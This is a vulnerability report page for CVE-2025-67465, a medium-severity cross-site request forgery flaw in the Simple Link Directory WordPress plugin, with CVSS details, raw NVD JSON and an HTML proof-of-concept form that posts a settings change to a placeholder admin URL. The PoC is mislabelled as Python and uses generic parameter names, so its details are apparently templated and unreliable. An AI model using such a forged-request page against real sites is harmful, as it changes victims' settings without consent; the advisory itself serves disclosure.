Security Vulnerability Report
中文
CVE-2025-67465 CVSS 4.3 MEDIUM

CVE-2025-67465

Published: 2025-12-09 16:18:22
Last Modified: 2026-04-27 18:16:39

Description

Cross-Site Request Forgery (CSRF) vulnerability in QuantumCloud Simple Link Directory simple-link-directory allows Cross Site Request Forgery.This issue affects Simple Link Directory: from n/a through <= 8.8.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple Link Directory <= 8.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67465 --> <!-- This PoC demonstrates a CSRF attack on Simple Link Directory plugin --> <!-- It triggers a settings change or content modification --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-67465</title> </head> <body> <h2>CSRF PoC for Simple Link Directory <= 8.8.3</h2> <p>Click the button below to trigger the CSRF attack:</p> <!-- Example: Modify plugin settings --> <form action="http://target-site/wp-admin/admin.php?page=sld_settings" method="POST" id="csrfForm"> <input type="hidden" name="sld_option" value="malicious_value"> <input type="hidden" name="action" value="save_settings"> <!-- Add other required parameters based on actual plugin endpoints --> </form> <button type="submit" onclick="this.innerHTML='Attack Sent!'">Submit Request</button> <script> // Auto-submit on page load (commented out for safety) // document.getElementById('csrfForm').submit(); </script> <p><strong>Note:</strong> Replace 'target-site' with the actual WordPress site URL.</p> <p><strong>Mitigation:</strong> Add CSRF tokens (nonce) to all state-changing operations.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67465", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:22.483", "lastModified": "2026-04-27T18:16:39.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in QuantumCloud Simple Link Directory simple-link-directory allows Cross Site Request Forgery.This issue affects Simple Link Directory: from n/a through <= 8.8.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-link-directory/vulnerability/wordpress-simple-link-directory-plugin-8-8-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}